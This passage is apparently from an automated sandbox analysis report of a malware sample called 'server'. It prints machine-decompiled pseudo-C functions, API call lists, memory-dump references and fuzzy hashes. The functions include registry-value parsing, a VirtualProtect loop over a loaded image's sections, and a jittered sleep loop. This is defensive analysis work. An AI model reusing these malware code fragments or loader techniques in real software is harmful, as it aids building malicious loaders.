              • Instruction ID: 5d9c3f05f0f46dd7afa9dd855db83e90556071015df760abc973ca805bcb04d9
              • Opcode Fuzzy Hash: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
              • Instruction Fuzzy Hash: 0BE0B6B1403220ABC7116F71BE0CA4F7E28BB89B527000539FA05F2279CB384A41CADC
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E02CE5251(void* __edx) {
              				void* _v8;
              				int _v12;
              				WCHAR* _v16;
              				void* __edi;
              				void* __esi;
              				void* _t23;
              				intOrPtr _t24;
              				void* _t26;
              				intOrPtr _t32;
              				intOrPtr _t35;
              				intOrPtr _t38;
              				intOrPtr _t42;
              				void* _t45;
              				void* _t50;
              				void* _t52;
              
              				_t50 = __edx;
              				_v12 = 0;
              				_t23 = E02CE6ADC(0,  &_v8); // executed
              				if(_t23 != 0) {
              					_v8 = 0;
              				}
              				_t24 =  *0x2cea348; // 0x256d5a8
              				_t4 = _t24 + 0x2cebc70; // 0x5259218
              				_t5 = _t24 + 0x2cebb60; // 0x4f0053
              				_t26 = E02CE33F1( &_v16, _v8, _t5, _t4); // executed
              				_t45 = _t26;
              				if(_t45 == 0) {
              					StrToIntExW(_v16, 0,  &_v12);
              					_t45 = 8;
              					if(_v12 < _t45) {
              						_t45 = 1;
              						__eflags = 1;
              					} else {
              						_t32 =  *0x2cea348; // 0x256d5a8
              						_t11 = _t32 + 0x2cebcc8; // 0x5259270
              						_t48 = _t11;
              						_t12 = _t32 + 0x2cebb60; // 0x4f0053
              						_t52 = E02CE5DE4(_t11, _t12, _t11);
              						_t59 = _t52;
              						if(_t52 != 0) {
              							_t35 =  *0x2cea348; // 0x256d5a8
              							_t13 = _t35 + 0x2cebcf0; // 0x30314549
              							if(E02CE5157(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
              								_t61 =  *0x2cea2fc - 6;
              								if( *0x2cea2fc <= 6) {
              									_t42 =  *0x2cea348; // 0x256d5a8
              									_t15 = _t42 + 0x2cebcd2; // 0x52384549
              									E02CE5157(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
              								}
              							}
              							_t38 =  *0x2cea348; // 0x256d5a8
              							_t17 = _t38 + 0x2cebbb8; // 0x5259160
              							_t18 = _t38 + 0x2cebc1c; // 0x680043
              							_t45 = E02CE5B0E(_v8, 0x80000001, _t52, _t18, _t17);
              							HeapFree( *0x2cea2d8, 0, _t52);
              						}
              					}
              					HeapFree( *0x2cea2d8, 0, _v16);
              				}
              				_t54 = _v8;
              				if(_v8 != 0) {
              					E02CE7220(_t54);
              				}
              				return _t45;
              			}


















              0x02ce5251
              0x02ce5261
              0x02ce5264
              0x02ce526b
              0x02ce526d
              0x02ce526d
              0x02ce5270
              0x02ce5275
              0x02ce527c
              0x02ce5289
              0x02ce528e
              0x02ce5292
              0x02ce52a0
              0x02ce52ae
              0x02ce52b2
              0x02ce5343
              0x02ce5343
              0x02ce52b8
              0x02ce52b8
              0x02ce52bd
              0x02ce52bd
              0x02ce52c4
              0x02ce52d0
              0x02ce52d2
              0x02ce52d4
              0x02ce52d6
              0x02ce52dd
              0x02ce52ef
              0x02ce52f1
              0x02ce52f8
              0x02ce52fa
              0x02ce5301
              0x02ce530c
              0x02ce530c
              0x02ce52f8
              0x02ce5311
              0x02ce5316
              0x02ce531d
              0x02ce533b
              0x02ce533d
              0x02ce533d
              0x02ce52d4
              0x02ce534f
              0x02ce534f
              0x02ce5351
              0x02ce5356
              0x02ce5358
              0x02ce5358
              0x02ce5363

              APIs
              • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05259218,00000000,?,7476F710,00000000,7476F730), ref: 02CE52A0
              • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05259160,?,00000000,30314549,00000014,004F0053,05259270), ref: 02CE533D
              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02CE68B6), ref: 02CE534F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: FreeHeap
              • String ID: Uqt
              • API String ID: 3298025750-2320327147
              • Opcode ID: 34c93d9211a54efb74182a443c3ba83decb1342b99a36901acc302e0c38e212b
              • Instruction ID: 043e3bfa7f914c604d06f4fd6457d0c8cedb18c966c5082212580938e324a890
              • Opcode Fuzzy Hash: 34c93d9211a54efb74182a443c3ba83decb1342b99a36901acc302e0c38e212b
              • Instruction Fuzzy Hash: 5531A932900248EFCF11DBA1DC84EAE3BB9FB48748F5501A5E60AAB121DB709E54EB50
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • SysAllocString.OLEAUT32(80000002), ref: 02CE43B5
              • SysAllocString.OLEAUT32(02CE4D42), ref: 02CE43F9
              • SysFreeString.OLEAUT32(00000000), ref: 02CE440D
              • SysFreeString.OLEAUT32(00000000), ref: 02CE441B
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: String$AllocFree
              • String ID:
              • API String ID: 344208780-0
              • Opcode ID: dd84421adce7eb488505c5c556844a0671107834d54423f9f84302d00d0d2281
              • Instruction ID: 17ec75945afe8b07f91502dbc7dfd4999765a30eadf38c28af7b54039e40ee61
              • Opcode Fuzzy Hash: dd84421adce7eb488505c5c556844a0671107834d54423f9f84302d00d0d2281
              • Instruction Fuzzy Hash: 0A310CB6A00249EFCF15DF98D8C09AE7BB9FF48345B10852EF9069B250D7709A81CF65
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 65%
              			E02CE213E(void* __ecx, intOrPtr _a4) {
              				struct _FILETIME _v12;
              				int _t13;
              				signed int _t16;
              				void* _t17;
              				signed int _t18;
              				unsigned int _t22;
              				void* _t30;
              				signed int _t34;
              
              				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
              				asm("stosd");
              				do {
              					_t13 = SwitchToThread();
              					GetSystemTimeAsFileTime( &_v12);
              					_t22 = _v12.dwHighDateTime;
              					_t16 = (_t22 << 0x00000020 | _v12.dwLowDateTime) >> 5;
              					_push(0);
              					_push(0x13);
              					_push(_t22 >> 5);
              					_push(_t16);
              					L02CE8436();
              					_t34 = _t16 + _t13;
              					_t17 = E02CE6269(_a4, _t34);
              					_t30 = _t17;
              					_t18 = 3;
              					Sleep(_t18 << (_t34 & 0x00000007)); // executed
              				} while (_t30 == 1);
              				return _t30;
              			}











              0x02ce2143
              0x02ce214e
              0x02ce214f
              0x02ce214f
              0x02ce215b
              0x02ce2164
              0x02ce2167
              0x02ce216b
              0x02ce216d
              0x02ce2172
              0x02ce2173
              0x02ce2174
              0x02ce217e
              0x02ce2181
              0x02ce2188
              0x02ce218c
              0x02ce2193
              0x02ce2199
              0x02ce21a3

              APIs
              • SwitchToThread.KERNEL32(?,00000001,?,?,?,02CE5044,?,?), ref: 02CE214F
              • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,02CE5044,?,?), ref: 02CE215B
              • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 02CE2174
                • Part of subcall function 02CE6269: memcpy.NTDLL(00000000,00000002,?,?,?,00000000,00000000), ref: 02CE6308
              • Sleep.KERNELBASE(00000003,00000000,?,00000001,?,?,?,02CE5044,?,?), ref: 02CE2193
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
              • String ID:
              • API String ID: 1610602887-0
              • Opcode ID: 0730d4b136e04f369577b490ddcdf9e14cae009c25247189f0b099150839dc8e
              • Instruction ID: 1d817f130898dfb8eea6a02bd52347cb48cf8baf0482789cfea853292e653401
              • Opcode Fuzzy Hash: 0730d4b136e04f369577b490ddcdf9e14cae009c25247189f0b099150839dc8e
              • Instruction Fuzzy Hash: A1F0A477B40204BBDB149AA4CC59BDF76BDDB84361F500624E602E7340E6B49B018A91
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 87%
              			E004014CF(void* __eax, void* _a4) {
              				signed int _v8;
              				signed int _v12;
              				signed int _v16;
              				long _v20;
              				int _t42;
              				long _t53;
              				intOrPtr _t56;
              				void* _t57;
              				signed int _t59;
              
              				_v12 = _v12 & 0x00000000;
              				_t56 =  *0x404180;
              				_t57 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
              				_v16 =  *(__eax + 6) & 0x0000ffff;
              				VirtualProtect(_a4,  *(__eax + 0x54), _t56 - 0x43175abf,  &_v20); // executed
              				_v8 = _v8 & 0x00000000;
              				if(_v16 <= 0) {
              					L12:
              					return _v12;
              				} else {
              					goto L1;
              				}
              				while(1) {
              					L1:
              					_t59 = _v12;
              					if(_t59 != 0) {
              						goto L12;
              					}
              					asm("bt [esi+0x24], eax");
              					if(_t59 >= 0) {
              						asm("bt [esi+0x24], eax");
              						if(__eflags >= 0) {
              							L8:
              							_t53 = _t56 - 0x43175abf;
              							L9:
              							_t42 = VirtualProtect( *((intOrPtr*)(_t57 + 0xc)) + _a4,  *(_t57 + 8), _t53,  &_v20); // executed
              							if(_t42 == 0) {
              								_v12 = GetLastError();
              							}
              							_t57 = _t57 + (_t56 - 0x3175ac2) * 0x28;
              							_v8 = _v8 + 1;
              							if(_v8 < _v16) {
              								continue;
              							} else {
              								goto L12;
              							}
              						}
              						asm("bt [esi+0x24], eax");
              						_t53 = _t56 - 0x43175ac1;
              						if(__eflags >= 0) {
              							goto L9;
              						}
              						goto L8;
              					}
              					asm("bt [esi+0x24], eax");
              					if(_t59 >= 0) {
              						_t53 = _t56 - 0x43175aa3;
              					} else {
              						_t53 = _t56 - 0x43175a83;
              					}
              					goto L9;
              				}
              				goto L12;
              			}












              0x004014d9
              0x004014e6
              0x004014ec
              0x004014f8
              0x00401508
              0x0040150a
              0x00401512
              0x004015a6
              0x004015ad
              0x00000000
              0x00000000
              0x00000000
              0x00401518
              0x00401518
              0x00401518
              0x0040151c
              0x00000000
              0x00000000
              0x00401528
              0x0040152c
              0x00401550
              0x00401554
              0x00401568
              0x00401568
              0x0040156e
              0x0040157d
              0x00401581
              0x00401589
              0x00401589
              0x00401595
              0x00401597
              0x004015a0
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x004015a0
              0x0040155c
              0x00401560
              0x00401566
              0x00000000
              0x00000000
              0x00000000
              0x00401566
              0x00401534
              0x00401538
              0x00401542
              0x0040153a
              0x0040153a
              0x0040153a
              0x00000000
              0x00401538
              0x00000000

              APIs
              • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
              • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 0040157D
              • GetLastError.KERNEL32 ref: 00401583
              Memory Dump Source
              • Source File: 00000000.00000002.568497701.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.568497701.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.568497701.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.568497701.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_server.jbxd
              Similarity
              • API ID: ProtectVirtual$ErrorLast
              • String ID:
              • API String ID: 1469625949-0
              • Opcode ID: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
              • Instruction ID: db8870d9979c58085381c8b0541bfb0d1fdb36fbc34c572f0fe0e58abbf4653c
              • Opcode Fuzzy Hash: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
              • Instruction Fuzzy Hash: D1212B7280121AEFCB14CF95C9819AAF7B4FF58305F04487AE413AB960E738AA55CF58
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 47%
              			E02CE12C6(char* _a4, char** _a8) {
              				char* _t7;
              				char* _t11;
              				char* _t14;
              				char* _t16;
              				char* _t17;
              				char _t18;
              				signed int _t20;
              				signed int _t22;
              
              				_t16 = _a4;
              				_push(0x20);
              				_t20 = 1;
              				_push(_t16);
              				while(1) {
              					_t7 = StrChrA();
              					if(_t7 == 0) {
              						break;
              					}
              					_t20 = _t20 + 1;
              					_push(0x20);
              					_push( &(_t7[1]));
              				}
              				_t11 = E02CE33DC(_t20 << 2);
              				_a4 = _t11;
              				if(_t11 != 0) {
              					StrTrimA(_t16, 0x2ce9278); // executed
              					_t22 = 0;
              					do {
              						_t14 = StrChrA(_t16, 0x20);
              						if(_t14 != 0) {
              							 *_t14 = 0;
              							do {
              								_t14 =  &(_t14[1]);
              								_t18 =  *_t14;
              							} while (_t18 == 0x20 || _t18 == 9);
              						}
              						_t17 = _a4;
              						 *(_t17 + _t22 * 4) = _t16;
              						_t22 = _t22 + 1;
              						_t16 = _t14;
              					} while (_t14 != 0);
              					 *_a8 = _t17;
              				}
              				return 0;
              			}











              0x02ce12ca
              0x02ce12d7
              0x02ce12d9
              0x02ce12da
              0x02ce12e2
              0x02ce12e2
              0x02ce12e6
              0x00000000
              0x00000000
              0x02ce12dd
              0x02ce12de
              0x02ce12e1
              0x02ce12e1
              0x02ce12ee
              0x02ce12f3
              0x02ce12f8
              0x02ce1300
              0x02ce1306
              0x02ce1308
              0x02ce130b
              0x02ce130f
              0x02ce1311
              0x02ce1314
              0x02ce1314
              0x02ce1315
              0x02ce1317
              0x02ce1314
              0x02ce1321
              0x02ce1324
              0x02ce1327
              0x02ce1328
              0x02ce132a
              0x02ce1331
              0x02ce1331
              0x02ce133d

              APIs
              • StrChrA.SHLWAPI(?,00000020,00000000,052595FC,?,?,02CE53AF,?,052595FC), ref: 02CE12E2
              • StrTrimA.KERNELBASE(?,02CE9278,00000002,?,02CE53AF,?,052595FC), ref: 02CE1300
              • StrChrA.SHLWAPI(?,00000020,?,02CE53AF,?,052595FC), ref: 02CE130B
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: Trim
              • String ID:
              • API String ID: 3043112668-0
              • Opcode ID: 0147fdeecc842c26f19b00f7208c5ee24b81be527329f7327ecfce9f4aca6bc2
              • Instruction ID: 17322f007b8a70e25a3d6d508134ba72b83af5ed8f8474fe34ed5946abc13b4c
              • Opcode Fuzzy Hash: 0147fdeecc842c26f19b00f7208c5ee24b81be527329f7327ecfce9f4aca6bc2
              • Instruction Fuzzy Hash: 4F015E72700346AEEF104A6A8C44FA77B9DEBC5754F481011A95FCB282D6B0DD52C660
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E02CE61DA(void* _a4) {
              				char _t2;
              
              				_t2 = RtlFreeHeap( *0x2cea2d8, 0, _a4); // executed
              				return _t2;
              			}




              0x02ce61e6
              0x02ce61ec

              APIs
              • RtlFreeHeap.NTDLL(00000000,00000000,02CE6383,00000000,?,00000000,00000000), ref: 02CE61E6
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: FreeHeap
              • String ID: Uqt
              • API String ID: 3298025750-2320327147
              • Opcode ID: 4be9eeea6982f49f4947d701444666b823e63e9a4e357afb61ccdca25e608813
              • Instruction ID: 98d8326ebabb5471bf5b92b01a4b3e8ccd72dfd1a993043e6916229f7ced3a84
              • Opcode Fuzzy Hash: 4be9eeea6982f49f4947d701444666b823e63e9a4e357afb61ccdca25e608813
              • Instruction Fuzzy Hash: D6B01272980200EFCF114B01DE04F057A31A794700F104A10F3091807082320430FB15
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 75%
              			E02CE790B(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
              				void* _v8;
              				void* __esi;
              				intOrPtr* _t35;
              				void* _t40;
              				intOrPtr* _t41;
              				intOrPtr* _t43;
              				intOrPtr* _t45;
              				intOrPtr* _t50;
              				intOrPtr* _t52;
              				void* _t54;
              				intOrPtr* _t55;
              				intOrPtr* _t57;
              				intOrPtr* _t61;
              				intOrPtr* _t65;
              				intOrPtr _t68;
              				void* _t72;
              				void* _t75;
              				void* _t76;
              
              				_t55 = _a4;
              				_t35 =  *((intOrPtr*)(_t55 + 4));
              				_a4 = 0;
              				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
              				if(_t76 < 0) {
              					L18:
              					return _t76;
              				}
              				_t40 = E02CE4358(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
              				_t76 = _t40;
              				if(_t76 >= 0) {
              					_t61 = _a28;
              					if(_t61 != 0 &&  *_t61 != 0) {
              						_t52 = _v8;
              						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
              					}
              					if(_t76 >= 0) {
              						_t43 =  *_t55;
              						_t68 =  *0x2cea348; // 0x256d5a8
              						_t20 = _t68 + 0x2ceb270; // 0x740053
              						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
              						if(_t76 >= 0) {
              							_t76 = E02CE4984(_a4);
              							if(_t76 >= 0) {
              								_t65 = _a28;
              								if(_t65 != 0 &&  *_t65 == 0) {
              									_t50 = _a4;
              									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
              								}
              							}
              						}
              						_t45 = _a4;
              						if(_t45 != 0) {
              							 *((intOrPtr*)( *_t45 + 8))(_t45);
              						}
              						_t57 = __imp__#6;
              						if(_a20 != 0) {
              							 *_t57(_a20);
              						}
              						if(_a12 != 0) {
              							 *_t57(_a12);
              						}
              					}
              				}
              				_t41 = _v8;
              				 *((intOrPtr*)( *_t41 + 8))(_t41);
              				goto L18;
              			}





















              0x02ce7911
              0x02ce7914
              0x02ce7924
              0x02ce792d
              0x02ce7931
              0x02ce79ff
              0x02ce7a05
              0x02ce7a05
              0x02ce794b
              0x02ce7950
              0x02ce7954
              0x02ce795a
              0x02ce795f
              0x02ce7966
              0x02ce7975
              0x02ce7975
              0x02ce7979
              0x02ce797b
              0x02ce7987
              0x02ce7992
              0x02ce799d
              0x02ce79a1
              0x02ce79ab
              0x02ce79af
              0x02ce79b1
              0x02ce79b6
              0x02ce79bd
              0x02ce79cd
              0x02ce79cd
              0x02ce79b6
              0x02ce79af
              0x02ce79cf
              0x02ce79d4
              0x02ce79d9
              0x02ce79d9
              0x02ce79dc
              0x02ce79e5
              0x02ce79ea
              0x02ce79ea
              0x02ce79ef
              0x02ce79f4
              0x02ce79f4
              0x02ce79ef
              0x02ce7979
              0x02ce79f6
              0x02ce79fc
              0x00000000

              APIs
                • Part of subcall function 02CE4358: SysAllocString.OLEAUT32(80000002), ref: 02CE43B5
                • Part of subcall function 02CE4358: SysFreeString.OLEAUT32(00000000), ref: 02CE441B
              • SysFreeString.OLEAUT32(?), ref: 02CE79EA
              • SysFreeString.OLEAUT32(02CE4D42), ref: 02CE79F4
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: String$Free$Alloc
              • String ID:
              • API String ID: 986138563-0
              • Opcode ID: 561a32a264b3ad58c5e24d202e5ecc330435cb7cb1fe0accc05abcdbcdb9b3ff
              • Instruction ID: fd690b2d8a182d8bcea23c486fc847a659b0c78cdb8d7a631ee0b737d6cfcd6d
              • Opcode Fuzzy Hash: 561a32a264b3ad58c5e24d202e5ecc330435cb7cb1fe0accc05abcdbcdb9b3ff
              • Instruction Fuzzy Hash: 54314A72500259AFCF25DF68C888CAFBB7AFFC97447144658F8069B214D7319D91DBA0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E0040139F() {
              				char _v16;
              				intOrPtr _v28;
              				void _v32;
              				void* _v36;
              				intOrPtr _t15;
              				void* _t16;
              				void* _t24;
              				long _t25;
              				int _t26;
              				void* _t30;
              				intOrPtr* _t32;
              				signed int _t35;
              				intOrPtr _t38;
              
              				_t15 =  *0x404184;
              				if( *0x40416c > 5) {
              					_t16 = _t15 + 0x40513c;
              				} else {
              					_t16 = _t15 + 0x40529c;
              				}
              				E00401D3C(_t16, _t16);
              				_t35 = 6;
              				memset( &_v32, 0, _t35 << 2);
              				_t24 = E00401882( &_v32,  &_v16,  *0x404180 ^ 0xdd0210cf); // executed
              				if(_t24 == 0) {
              					_t25 = 0xb;
              				} else {
              					_t26 = lstrlenW( *0x404178);
              					_t8 = _t26 + 2; // 0x2
              					_t11 = _t26 + _t8 + 8; // 0xa
              					_t30 = E004015B0(_t38, _t11,  &_v32,  &_v36); // executed
              					if(_t30 == 0) {
              						_t32 = _v36;
              						 *_t32 = 0;
              						if( *0x404178 == 0) {
              							 *((short*)(_t32 + 4)) = 0;
              						} else {
              							L00401FE6(_t32 + 4);
              						}
              					}
              					_t25 = E004012FB(_v28); // executed
              				}
              				ExitThread(_t25);
              			}
















              0x004013a5
              0x004013b6
              0x004013c0
              0x004013b8
              0x004013b8
              0x004013b8
              0x004013c7
              0x004013d0
              0x004013d5
              0x004013ec
              0x004013f3
              0x00401450
              0x004013f5
              0x004013fb
              0x00401401
              0x0040140f
              0x00401413
              0x0040141a
              0x00401422
              0x00401426
              0x0040142e
              0x0040143f
              0x00401430
              0x00401436
              0x00401436
              0x0040142e
              0x00401447
              0x00401447
              0x00401452

              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.568497701.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.568497701.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.568497701.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.568497701.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_server.jbxd
              Similarity
              • API ID: ExitThreadlstrlen
              • String ID:
              • API String ID: 2636182767-0
              • Opcode ID: ac67e65bd4c915eb781d54c6f39458c359880d29bbf57a3e932865a973960b97
              • Instruction ID: 2b8b17c81bcefa181eed95ac27ced154ec6146dfe98fb58ff2424010aaaeeb75
              • Opcode Fuzzy Hash: ac67e65bd4c915eb781d54c6f39458c359880d29bbf57a3e932865a973960b97
              • Instruction Fuzzy Hash: A511E271504205ABE700EB61DD48E5B77ECAF84314F00493BB941F72B1EB38EA448B5A
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E02CE33F1(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
              				void* _t21;
              				void* _t22;
              				signed int _t24;
              				intOrPtr* _t26;
              				void* _t27;
              
              				_t26 = __edi;
              				if(_a4 == 0) {
              					L2:
              					_t27 = E02CE58BD(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
              					if(_t27 == 0) {
              						_t24 = _a12 >> 1;
              						if(_t24 == 0) {
              							_t27 = 2;
              							HeapFree( *0x2cea2d8, 0, _a4);
              						} else {
              							_t21 = _a4;
              							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
              							 *_t26 = _t21;
              						}
              					}
              					L6:
              					return _t27;
              				}
              				_t22 = E02CE2839(_a4, _a8, _a12, __edi); // executed
              				_t27 = _t22;
              				if(_t27 == 0) {
              					goto L6;
              				}
              				goto L2;
              			}








              0x02ce33f1
              0x02ce33f9
              0x02ce3410
              0x02ce342b
              0x02ce342f
              0x02ce3434
              0x02ce3436
              0x02ce3448
              0x02ce3454
              0x02ce3438
              0x02ce3438
              0x02ce343d
              0x02ce3442
              0x02ce3442
              0x02ce3436
              0x02ce345a
              0x02ce345e
              0x02ce345e
              0x02ce3405
              0x02ce340a
              0x02ce340e
              0x00000000
              0x00000000
              0x00000000

              APIs
                • Part of subcall function 02CE2839: SysFreeString.OLEAUT32(00000000), ref: 02CE289C
              • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,7476F710,?,00000000,?,00000000,?,02CE528E,?,004F0053,05259218,00000000,?), ref: 02CE3454
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: Free$HeapString
              • String ID: Uqt
              • API String ID: 3806048269-2320327147
              • Opcode ID: 1fdd629d6aff88aa05ac2eabc1b4ed365d05573d6139bc0e5f7f00b0da0c69ba
              • Instruction ID: 549b172dcc427f8ab7589249148a6801c7905929a1f4c6e77c1095208a7c9676
              • Opcode Fuzzy Hash: 1fdd629d6aff88aa05ac2eabc1b4ed365d05573d6139bc0e5f7f00b0da0c69ba
              • Instruction Fuzzy Hash: F1012C32900559BBCF239F54CC00FEA3FA5EF44750F448564FE1A9B120D7319960DB90
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02E4EBBB
              • Module32First.KERNEL32(00000000,00000224), ref: 02E4EBDB
              Memory Dump Source
              • Source File: 00000000.00000002.568856386.0000000002E48000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E48000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2e48000_server.jbxd
              Yara matches
              Similarity
              • API ID: CreateFirstModule32SnapshotToolhelp32
              • String ID:
              • API String ID: 3833638111-0
              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
